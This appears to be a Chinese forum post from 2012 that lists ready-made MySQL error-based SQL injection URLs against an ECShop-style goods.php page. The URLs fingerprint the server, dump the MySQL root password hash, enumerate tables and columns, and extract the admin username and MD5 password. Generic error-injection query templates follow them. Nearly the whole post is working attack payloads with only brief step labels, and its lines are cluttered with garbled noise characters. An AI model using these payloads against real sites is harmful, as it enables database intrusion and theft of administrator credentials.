判断版本号
7 ^6 @3 O2 r$ e4 {3 r; uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: K6 Y ?1 V; | v7 k! F6 D6 I h5 q: v; B8 U5 f
判断系统
/ N1 L) Q3 ~! g3 a$ G: u' @+ t) E4 d9 Q: y! S3 }
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 m- d& m% e1 V- A. w" B0 v0 p; h# P* ~6 D6 K1 G! ?
( c0 @$ j0 N8 M- r% [4 f$ E; n8 o" L0 }( Y
当前 user()
. x b7 M H3 r7 g: u! h" W
# f# o1 ~/ V5 U4 \) A+ X5 _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# p- Y, u) r+ [4 ]
4 V5 l: G, J5 W5 ^* J
6 p/ ^% p l# I, X3 s5 B2 _# F$ a N0 R
当前 database()
$ J9 t1 n2 r8 e# L4 @% Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 `! S0 d" Q8 _' D, n4 q9 ]( u3 _- T
% e. J" u% @$ a5 ?$ K0 v) H. V5 e& P5 [8 E8 d
' z! o$ |# L( {. g& \1 E1 N: b
root hash; N5 l! l' s+ l3 V
) a' L: v+ c* y( R; K7 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 X* V' B6 y7 k0 T
7 N. k, M l3 M0 j
" t0 r9 n& [7 {4 r7 @ N
# S( y! ^! t1 o7 u1 ~ p% e) F当前 数据库表名
6 M, y) ]) e' K( E I
}7 U. ^1 S$ p8 R- }, X) i! L3 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& ~" r0 T# q$ c/ n" M0 [2 F/ g
. G" u8 A1 f* s3 t
& E' Q: Q: l6 f* \# N& j1 R
( n/ j& l0 M# Z% b7 ], I当前 数据库 user_name 字段' C3 Y2 J2 v1 |8 r
. ~" B/ ~) h5 r5 j+ J+ A- m1 bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 n) |& ?) ?4 E5 k# ^, ?3 T2 g* u" F1 z. z+ _9 L$ t! `
当前 数据库 字段 password" _* x1 _) [9 }
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# O/ j- B' K4 w/ p1 P+ r4 V
1 k* z% n2 k! f) @- l
8 Q2 S3 |$ C# A8 R4 F/ X' v8 H8 m% c
获得 admin passwd(md5)
6 ?$ c) l! q [% ]$ G8 c6 Z! P. [+ `! t6 Y/ ?* j9 ]
1 W1 @, S: X( A# c0 C
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; a5 n9 s K) L, ?
I2 E Y6 e1 p7 g- o
报错注射- u+ L" m5 E" A" Y7 D9 [6 N
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)7 ?" I; q8 c7 u0 x/ U' _
6 h0 X" O( e2 o" m" g0 g: q DSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)1 q0 A+ N3 K5 F6 h
% S' P. r7 t& Tand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对